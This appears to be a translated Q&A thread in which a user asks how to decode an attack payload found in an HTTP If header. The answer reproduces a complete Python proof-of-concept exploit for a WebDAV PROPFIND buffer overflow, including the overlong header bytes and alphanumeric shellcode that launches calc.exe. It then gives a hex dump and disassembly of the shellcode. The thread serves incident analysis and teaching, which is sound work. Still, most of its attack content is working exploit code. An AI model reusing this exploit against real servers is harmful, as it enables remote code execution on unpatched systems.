¿Cómo decodifico esta carga útil de hackers?

3

Un hacker envió esto a través de apache $_SERVER["HTTP_IF"] :

http://localhost/aaaaaaa潨硣睡焳椶䝲稹䭷佰畓穏䡨噣浔桅㥓偬啧杣㍤䘰硅楒吱䱘橑牁䈱瀵塐㙤汇㔹呪倴呃睒偡㈲测水㉇扁㝍兡塢䝳剐㙰畄桪㍴乊硫䥶乳䱪坺潱塊㈰㝮䭉前䡣潌畖畵景癨䑍偰稶手敗畐橲穫睢癘扈攱ご汹偊呢倳㕷橷䅄㌴摶䵆噔䝬敃瘲牸坩䌸扲娰夸呈ȂȂዀ栃汄剖䬷汭佘塚祐䥪塏䩒䅐晍Ꮐ栃䠴攱潃湦瑁䍬Ꮐ栃千橁灒㌰塦䉌灋捆关祁穐䩬> (Not <locktoken:write1>) <http://localhost/bbbbbbb祈慵佃潧歯䡅㙆杵䐳㡱坥婢吵噡楒橓兗㡎奈捕䥱䍤摲㑨䝘煹㍫歕浈偏穆㑱潔瑃奖潯獁㑗慨穲㝅䵉坎呈䰸㙺㕲扦湃䡭㕈慷䵚慴䄳䍥割浩㙱乤渹捓此兆估硯牓材䕓穣焹体䑖漶獹桷穖慊㥅㘹氹䔱㑲卥塊䑎穄氵婖扁湲昱奙吳ㅂ塥奁煐〶坷䑗卡Ꮐ栃湏栀湏栀䉇癪Ꮐ栃䉗佴奇刴䭦䭂瑤硯悂栁儵牺瑺䵇䑙块넓栀ㅶ湯ⓣ栁ᑠ栃̀翾Ꮐ栃Ѯ栃煮瑰ᐴ栃⧧栁鎑栀㤱普䥕げ呫癫牊祡ᐜ栃清栀眲票䵩㙬䑨䵰艆栀䡷㉓ᶪ栂潪䌵ᏸ栃⧧栁VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBKLIX1yYpYpipS0ayhe01IBc4dKNrlptKoblL2k1BZtBk3BkxzoFWPJNFLqyomaI0FLml0acLLBLlMPgQHOZmIqWWHbZPObr7dKqBjpdK12MlM1Z0bkOPT8Qu5p0tnj9qz0pPRkNhmHRkOhKpKQVsHcmlMyDKnTRkM1Z601ioMaepvLva8OlMzaY7nXYP1eYdkSSMXxMksMKtT5ZBR8Rkr8Ktyq9Cc64KzlpKTK28mLiqJ3rkM42km1hP3Yq4ldO4QK1KPab9qJr1ioIPNxqOaJRkLRxkTFQMS8RNC5qdm0c81gpiPnPisYK6OdphPLbWlfzgKOj5P1IoaG0Wb7R7PVrHLzNvt9FGYoz5zK30okp1WYPQNqBJYs0QOaQZNpb3NpbHaGSYEOevKOwehkpOb9P1Z21BrH9pP2c0BdNrnraBoaNrb0BHxkr5nNmk9oZ53YwVpjJpQKqX3Pp39pIpBiWp0jJdb02JMO1FOxsENfeNavYoweLqYonwB7aGNwqFQXNMkVMHQkiovuauI045kvpKjoe4Rcm0m0ipJKvqiYETkPipKPk84lyoKOIoLoPibMOqs7C53CnO31qR1SLo14pLnNRP1Xppm0ZKPkNQWPoopPqZyrpjIrb0QZm22Jm227Ox8ZyfWj0Oyovu4S01gPqVh8Jdm3o9gTr44MpLKtlHp1Y0fTM3r0B1b638zrF6dIzBIoGequY0D4nMaHReepD4kf1ZipPT20dMq4LdjlpPb3QXNM1GtnokYofu2cZLlDxkhNOcphVfbvcWQBYoZ5ozYpR72HP1dK2ORgyoj5PjIps8hp85DbaFIo6uJHrp9oIokONcoJNONOr2rERCPyos2L35qbLoloPsT6s3382Opsptlns5qhPeypyXibKNIoYoMa01LqLnOBOCp0lnmbLrp9lnP2nRlvKPAA
  1. ¿Cómo puedo decodificar esto yo mismo?
  2. ¿Qué dice?
  3. ¿Hay alguna herramienta automatizada que pueda usar para detectar y decodificar automáticamente este tipo de cosas? (Ojalá me pueda integrar en php7)
pregunta cybernard 19.04.2018 - 15:28
fuente

1 respuesta

11

Encontré este documento aquí .

#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China 
#-----------Email: [email protected]
import socket  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
sock.connect(('127.0.0.1',80))  
pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay+='If: <http://localhost/aaaaaaa'
pay+='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
pay+='>'
pay+=' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
pay+='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
pay+=shellcode
pay+='>\r\n\r\n'
print pay
sock.send(pay)  
data = sock.recv(80960)  
print data 
sock.close

Coincide con el inicio de su carga útil, que es:

http://localhost/aaaaaaa潨硣...

Texto chino a hexadecimal:

e6 bd a8 e7 a1 a3

Supongo que usaron esto para iniciar calc.exe.

Tal vez puedas empezar desde aquí.

EDIT:

Aunque no tengo una respuesta definitiva para ti, quizás pueda ser un poco más útil.

Tu código de shell parece ser:

VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBKLIX1yYpYpipS0ayhe01IBc4dKNrlptKoblL2k1BZtBk3BkxzoFWPJNFLqyomaI0FLml0acLLBLlMPgQHOZmIqWWHbZPObr7dKqBjpdK12MlM1Z0bkOPT8Qu5p0tnj9qz0pPRkNhmHRkOhKpKQVsHcmlMyDKnTRkM1Z601ioMaepvLva8OlMzaY7nXYP1eYdkSSMXxMksMKtT5ZBR8Rkr8Ktyq9Cc64KzlpKTK28mLiqJ3rkM42km1hP3Yq4ldO4QK1KPab9qJr1ioIPNxqOaJRkLRxkTFQMS8RNC5qdm0c81gpiPnPisYK6OdphPLbWlfzgKOj5P1IoaG0Wb7R7PVrHLzNvt9FGYoz5zK30okp1WYPQNqBJYs0QOaQZNpb3NpbHaGSYEOevKOwehkpOb9P1Z21BrH9pP2c0BdNrnraBoaNrb0BHxkr5nNmk9oZ53YwVpjJpQKqX3Pp39pIpBiWp0jJdb02JMO1FOxsENfeNavYoweLqYonwB7aGNwqFQXNMkVMHQkiovuauI045kvpKjoe4Rcm0m0ipJKvqiYETkPipKPk84lyoKOIoLoPibMOqs7C53CnO31qR1SLo14pLnNRP1Xppm0ZKPkNQWPoopPqZyrpjIrb0QZm22Jm227Ox8ZyfWj0Oyovu4S01gPqVh8Jdm3o9gTr44MpLKtlHp1Y0fTM3r0B1b638zrF6dIzBIoGequY0D4nMaHReepD4kf1ZipPT20dMq4LdjlpPb3QXNM1GtnokYofu2cZLlDxkhNOcphVfbvcWQBYoZ5ozYpR72HP1dK2ORgyoj5PjIps8hp85DbaFIo6uJHrp9oIokONcoJNONOr2rERCPyos2L35qbLoloPsT6s3382Opsptlns5qhPeypyXibKNIoYoMa01LqLnOBOCp0lnmbLrp9lnP2nRlvKPAA

Esto se traduce a esto en hexadecimal:

{ 0x56, 0x56, 0x59, 0x41, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x51, 0x41, 0x54, 0x41, 0x58, 0x41, 0x5A, 0x41, 0x50, 0x41, 0x33, 0x51, 0x41, 0x44, 0x41, 0x5A, 0x41, 0x42, 0x41, 0x52, 0x41, 0x4C, 0x41, 0x59, 0x41, 0x49, 0x41, 0x51, 0x41, 0x49, 0x41, 0x51, 0x41, 0x50, 0x41, 0x35, 0x41, 0x41, 0x41, 0x50, 0x41, 0x5A, 0x31, 0x41, 0x49, 0x31, 0x41, 0x49, 0x41, 0x49, 0x41, 0x4A, 0x31, 0x31, 0x41, 0x49, 0x41, 0x49, 0x41, 0x58, 0x41, 0x35, 0x38, 0x41, 0x41, 0x50, 0x41, 0x5A, 0x41, 0x42, 0x41, 0x42, 0x51, 0x49, 0x31, 0x41, 0x49, 0x51, 0x49, 0x41, 0x49, 0x51, 0x49, 0x31, 0x31, 0x31, 0x31, 0x41, 0x49, 0x41, 0x4A, 0x51, 0x49, 0x31, 0x41, 0x59, 0x41, 0x5A, 0x42, 0x41, 0x42, 0x41, 0x42, 0x41, 0x42, 0x41, 0x42, 0x33, 0x30, 0x41, 0x50, 0x42, 0x39, 0x34, 0x34, 0x4A, 0x42, 0x36, 0x58, 0x36, 0x57, 0x4D, 0x56, 0x37, 0x4F, 0x37, 0x5A, 0x38, 0x5A, 0x38, 0x59, 0x38, 0x59, 0x32, 0x54, 0x4D, 0x54, 0x4A, 0x54, 0x31, 0x4D, 0x30, 0x31, 0x37, 0x59, 0x36, 0x51, 0x30, 0x31, 0x30, 0x31, 0x30, 0x45, 0x4C, 0x53, 0x4B, 0x53, 0x30, 0x45, 0x4C, 0x53, 0x33, 0x53, 0x4A, 0x4D, 0x30, 0x4B, 0x37, 0x54, 0x30, 0x4A, 0x30, 0x36, 0x31, 0x4B, 0x34, 0x4B, 0x36, 0x55, 0x37, 0x57, 0x35, 0x4B, 0x4A, 0x4C, 0x4F, 0x4C, 0x4D, 0x52, 0x35, 0x5A, 0x4E, 0x4C, 0x30, 0x5A, 0x4D, 0x56, 0x35, 0x4C, 0x35, 0x4C, 0x4D, 0x58, 0x31, 0x5A, 0x4C, 0x50, 0x30, 0x56, 0x33, 0x4C, 0x35, 0x4F, 0x35, 0x53, 0x4C, 0x5A, 0x35, 0x59, 0x34, 0x50, 0x4B, 0x54, 0x34, 0x50, 0x34, 0x4F, 0x35, 0x4F, 0x34, 0x55, 0x33, 0x59, 0x4A, 0x4C, 0x37, 0x4E, 0x4C, 0x55, 0x38, 0x50, 0x4D, 0x50, 0x31, 0x51, 0x4D, 0x54, 0x4D, 0x4B, 0x30, 0x35, 0x31, 0x50, 0x31, 0x51, 0x30, 0x46, 0x36, 0x54, 0x30, 0x30, 0x4E, 0x5A, 0x4C, 0x4C, 0x32, 0x4B, 0x35, 0x55, 0x30, 0x4F, 0x30, 0x58, 0x36, 0x50, 0x30, 0x4E, 0x4B, 0x53, 0x30, 0x4C, 0x36, 0x50, 0x36, 0x53, 0x38, 0x53, 0x32, 0x4F, 0x34, 0x51, 0x31, 0x55, 0x31, 0x58, 0x30, 0x36, 0x30, 0x31, 0x33, 0x57, 0x37, 0x4D, 0x30, 0x42, 0x32, 0x58, 0x35, 0x4F, 0x35, 0x52, 0x32, 0x4F, 0x30, 0x32, 0x4C, 0x54, 0x4C, 0x50, 0x4D, 0x4B, 0x37, 0x55, 0x4B, 0x4C, 0x31, 0x59, 0x39, 0x54, 0x31, 0x5A, 0x37, 0x51, 0x30, 0x46, 0x4C, 0x57, 0x32, 0x52, 0x4B, 0x55, 0x31, 0x50, 0x37, 0x58, 0x4B, 0x51, 0x33, 0x4F, 0x34, 0x53, 0x32, 0x55, 0x4C, 0x52, 0x30, 0x44, 0x4A, 0x4E, 0x35, 0x51, 0x34, 0x57, 0x31, 0x4F, 0x30, 0x48, 0x4D, 0x51, 0x4C, 0x4F, 0x33, 0x54, 0x31, 0x59, 0x39, 0x56, 0x38, 0x56, 0x30, 0x4F, 0x31, 0x55, 0x30, 0x43, 0x35, 0x4C, 0x4B, 0x58, 0x31, 0x59, 0x30, 0x52, 0x32, 0x51, 0x4D, 0x53, 0x34, 0x55, 0x39, 0x4F, 0x32, 0x54, 0x39, 0x54, 0x4D, 0x4C, 0x35, 0x4B, 0x30, 0x52, 0x4D, 0x50, 0x30, 0x45, 0x33, 0x4F, 0x4A, 0x5A, 0x32, 0x51, 0x4D, 0x53, 0x4E, 0x4E, 0x4B, 0x53, 0x31, 0x51, 0x34, 0x4C, 0x34, 0x4F, 0x35, 0x51, 0x39, 0x59, 0x4D, 0x50, 0x39, 0x4B, 0x39, 0x4B, 0x36, 0x53, 0x4E, 0x4E, 0x4C, 0x5A, 0x31, 0x59, 0x38, 0x4E, 0x4D, 0x4C, 0x4D, 0x4C, 0x32, 0x51, 0x38, 0x51, 0x30, 0x30, 0x32, 0x55, 0x31, 0x30, 0x30, 0x5A, 0x39, 0x4F, 0x4B, 0x52, 0x31, 0x4D, 0x33, 0x59, 0x35, 0x54, 0x4A, 0x4D, 0x37, 0x4F, 0x4C, 0x58, 0x38, 0x50, 0x33, 0x55, 0x4C, 0x59, 0x37, 0x59, 0x30, 0x59, 0x37, 0x58, 0x34, 0x59, 0x4D, 0x57, 0x35, 0x4D, 0x4A, 0x55, 0x4C, 0x59, 0x37, 0x52, 0x31, 0x4D, 0x4B, 0x52, 0x4B, 0x51, 0x35, 0x57, 0x30, 0x58, 0x30, 0x4E, 0x33, 0x55, 0x31, 0x4B, 0x4C, 0x50, 0x39, 0x4F, 0x31, 0x50, 0x31, 0x4C, 0x33, 0x57, 0x39, 0x50, 0x35, 0x50, 0x4F, 0x4F, 0x30, 0x46, 0x32, 0x53, 0x4D, 0x58, 0x4A, 0x4E, 0x4A, 0x4D, 0x4A, 0x53, 0x38, 0x4B, 0x4A, 0x4E, 0x4B, 0x50, 0x41 }

Si desmonta el uso de ndisasm con el indicador -b 32, obtendrá:

00000000  0560560590        add eax,0x90055660
00000005  41                inc ecx
00000006  034034            add eax,[eax+0x34]
00000009  034034            add eax,[eax+0x34]
0000000C  034034            add eax,[eax+0x34]
0000000F  034034            add eax,[eax+0x34]
00000012  034034            add eax,[eax+0x34]
00000015  0510410540        add eax,0x40054110
0000001A  41                inc ecx
0000001B  05804105A0        add eax,0xa0054180
00000020  41                inc ecx
00000021  0500410330        add eax,0x30034100
00000026  51                push ecx
00000027  0410              add al,0x10
00000029  44                inc esp
0000002A  0410              add al,0x10
0000002C  5A                pop edx
0000002D  0410              add al,0x10
0000002F  42                inc edx
00000030  0410              add al,0x10
00000032  52                push edx
00000033  0410              add al,0x10
00000035  4C                dec esp
00000036  0410              add al,0x10
00000038  59                pop ecx
00000039  0410              add al,0x10
0000003B  49                dec ecx
0000003C  0410              add al,0x10
0000003E  51                push ecx
0000003F  0410              add al,0x10
00000041  49                dec ecx
00000042  0410              add al,0x10
00000044  51                push ecx
00000045  0410              add al,0x10
00000047  50                push eax
00000048  0410              add al,0x10
0000004A  3504104104        xor eax,0x4411004
0000004F  105004            adc [eax+0x4],dl
00000052  105A03            adc [edx+0x3],bl
00000055  104104            adc [ecx+0x4],al
00000058  90                nop
00000059  310410            xor [eax+edx],eax
0000005C  49                dec ecx
0000005D  0410              add al,0x10
0000005F  49                dec ecx
00000060  0410              add al,0x10
00000062  4A                dec edx
00000063  0310              add edx,[eax]
00000065  310410            xor [eax+edx],eax
00000068  49                dec ecx
00000069  0410              add al,0x10
0000006B  49                dec ecx
0000006C  0410              add al,0x10
0000006E  58                pop eax
0000006F  0410              add al,0x10
00000071  3503804104        xor eax,0x4418003
00000076  105004            adc [eax+0x4],dl
00000079  105A04            adc [edx+0x4],bl
0000007C  104204            adc [edx+0x4],al
0000007F  104205            adc [edx+0x5],al
00000082  104903            adc [ecx+0x3],cl
00000085  104104            adc [ecx+0x4],al
00000088  90                nop
00000089  51                push ecx
0000008A  0490              add al,0x90
0000008C  41                inc ecx
0000008D  0490              add al,0x90
0000008F  51                push ecx
00000090  0490              add al,0x90
00000092  3103              xor [ebx],eax
00000094  1031              adc [ecx],dh
00000096  0310              add edx,[eax]
00000098  41                inc ecx
00000099  0490              add al,0x90
0000009B  41                inc ecx
0000009C  04A0              add al,0xa0
0000009E  51                push ecx
0000009F  0490              add al,0x90
000000A1  310410            xor [eax+edx],eax
000000A4  59                pop ecx
000000A5  0410              add al,0x10
000000A7  5A                pop edx
000000A8  0420              add al,0x20
000000AA  41                inc ecx
000000AB  0420              add al,0x20
000000AD  41                inc ecx
000000AE  0420              add al,0x20
000000B0  41                inc ecx
000000B1  0420              add al,0x20
000000B3  41                inc ecx
000000B4  0420              add al,0x20
000000B6  3303              xor eax,[ebx]
000000B8  004105            add [ecx+0x5],al
000000BB  004203            add [edx+0x3],al
000000BE  90                nop
000000BF  3403              xor al,0x3
000000C1  40                inc eax
000000C2  4A                dec edx
000000C3  0420              add al,0x20
000000C5  360580360570      ss add eax,0x70053680
000000CB  4D                dec ebp
000000CC  05603704F0        add eax,0xf0043760
000000D1  37                aaa
000000D2  05A03805A0        add eax,0xa00538a0
000000D7  380590380590      cmp [dword 0x90053890],al
000000DD  3205404D0540      xor al,[dword 0x40054d40]
000000E3  4A                dec edx
000000E4  05403104D0        add eax,0xd0043140
000000E9  3003              xor [ebx],al
000000EB  1037              adc [edi],dh
000000ED  0590360510        add eax,0x10053690
000000F2  3003              xor [ebx],al
000000F4  1030              adc [eax],dh
000000F6  0310              add edx,[eax]
000000F8  300450            xor [eax+edx*2],al
000000FB  4C                dec esp
000000FC  05304B0530        add eax,0x30054b30
00000101  300450            xor [eax+edx*2],al
00000104  4C                dec esp
00000105  0530330530        add eax,0x30053330
0000010A  4A                dec edx
0000010B  04D0              add al,0xd0
0000010D  3004B0            xor [eax+esi*4],al
00000110  37                aaa
00000111  05403004A0        add eax,0xa0043040
00000116  3003              xor [ebx],al
00000118  60                pusha
00000119  3104B0            xor [eax+esi*4],eax
0000011C  3404              xor al,0x4
0000011E  B036              mov al,0x36
00000120  0550370570        add eax,0x70053750
00000125  3504B04A04        xor eax,0x44ab004
0000012A  C04F04C0          ror byte [edi+0x4],byte 0xc0
0000012E  4D                dec ebp
0000012F  05203505A0        add eax,0xa0053520
00000134  4E                dec esi
00000135  04C0              add al,0xc0
00000137  3005A04D0560      xor [dword 0x60054da0],al
0000013D  3504C03504        xor eax,0x435c004
00000142  C04D0580          ror byte [ebp+0x5],byte 0x80
00000146  3105A04C0500      xor [dword 0x54ca0],eax
0000014C  3005603304C0      xor [dword 0xc0043360],al
00000152  3504F03505        xor eax,0x535f004
00000157  304C05A0          xor [ebp+eax-0x60],cl
0000015B  3505903405        xor eax,0x5349005
00000160  004B05            add [ebx+0x5],cl
00000163  40                inc eax
00000164  3405              xor al,0x5
00000166  003404            add [esp+eax],dh
00000169  F03504F03405      lock xor eax,0x534f004
0000016F  50                push eax
00000170  3305904A04C0      xor eax,[dword 0xc0044a90]
00000176  37                aaa
00000177  04E0              add al,0xe0
00000179  4C                dec esp
0000017A  0550380500        add eax,0x53850
0000017F  4D                dec ebp
00000180  0500310510        add eax,0x10053100
00000185  4D                dec ebp
00000186  05404D04B0        add eax,0xb0044d40
0000018B  3003              xor [ebx],al
0000018D  50                push eax
0000018E  310500310510      xor [dword 0x10053100],eax
00000194  300460            xor [eax],al
00000197  360540300300      ss add eax,0x33040
0000019D  4E                dec esi
0000019E  05A04C04C0        add eax,0xc0044ca0
000001A3  3204B0            xor al,[eax+esi*4]
000001A6  3505503004        xor eax,0x4305005
000001AB  F0300580360500    lock xor [dword 0x53680],al
000001B2  3004E0            xor [eax],al
000001B5  4B                dec ebx
000001B6  05303004C0        add eax,0xc0043030
000001BB  360500360530      ss add eax,0x30053600
000001C1  3805303204F0      cmp [dword 0xf0043230],al
000001C7  3405              xor al,0x5
000001C9  1031              adc [ecx],dh
000001CB  0550310580        add eax,0x80053150
000001D0  3003              xor [ebx],al
000001D2  60                pusha
000001D3  3003              xor [ebx],al
000001D5  1033              adc [ebx],dh
000001D7  05703704D0        add eax,0xd0043770
000001DC  300420            xor [eax],al
000001DF  3205803504F0      xor al,[dword 0xf0043580]
000001E5  3505203204        xor eax,0x4322005
000001EA  F03003            lock xor [ebx],al
000001ED  204C0540          and [ebp+eax+0x40],cl
000001F1  4C                dec esp
000001F2  05004D04B0        add eax,0xb0044d00
000001F7  37                aaa
000001F8  05504B04C0        add eax,0xc0044b50
000001FD  310590390540      xor [dword 0x40053990],eax
00000203  3105A0370510      xor [dword 0x100537a0],eax
00000209  300460            xor [eax],al
0000020C  4C                dec esp
0000020D  0570320520        add eax,0x20053270
00000212  4B                dec ebx
00000213  0550310500        add eax,0x53150
00000218  37                aaa
00000219  05804B0510        add eax,0x10054b80
0000021E  3304F0            xor eax,[eax+esi*8]
00000221  3405              xor al,0x5
00000223  3032              xor [edx],dh
00000225  05504C0520        add eax,0x20054c50
0000022A  300440            xor [eax+eax*2],al
0000022D  4A                dec edx
0000022E  04E0              add al,0xe0
00000230  3505103405        xor eax,0x5341005
00000235  7031              jo 0x268
00000237  04F0              add al,0xf0
00000239  300480            xor [eax+eax*4],al
0000023C  4D                dec ebp
0000023D  05104C04F0        add eax,0xf0044c10
00000242  330540310590      xor eax,[dword 0x90053140]
00000248  390560380560      cmp [dword 0x60053860],eax
0000024E  3004F0            xor [eax+esi*8],al
00000251  310550300430      xor [dword 0x30043050],eax
00000257  3504C04B05        xor eax,0x54bc004
0000025C  803105            xor byte [ecx],0x5
0000025F  90                nop
00000260  300520320510      xor [dword 0x10053220],al
00000266  4D                dec ebp
00000267  0530340550        add eax,0x50053430
0000026C  3904F0            cmp [eax+esi*8],eax
0000026F  320540390540      xor al,[dword 0x40053940]
00000275  4D                dec ebp
00000276  04C0              add al,0xc0
00000278  3504B03005        xor eax,0x530b004
0000027D  204D05            and [ebp+0x5],cl
00000280  0030              add [eax],dh
00000282  0450              add al,0x50
00000284  3304F0            xor eax,[eax+esi*8]
00000287  4A                dec edx
00000288  05A0320510        add eax,0x100532a0
0000028D  4D                dec ebp
0000028E  05304E04E0        add eax,0xe0044e30
00000293  4B                dec ebx
00000294  0530310510        add eax,0x10053130
00000299  3404              xor al,0x4
0000029B  C0                db 0xc0
0000029C  3404              xor al,0x4
0000029E  F03505103905      lock xor eax,0x5391005
000002A4  90                nop
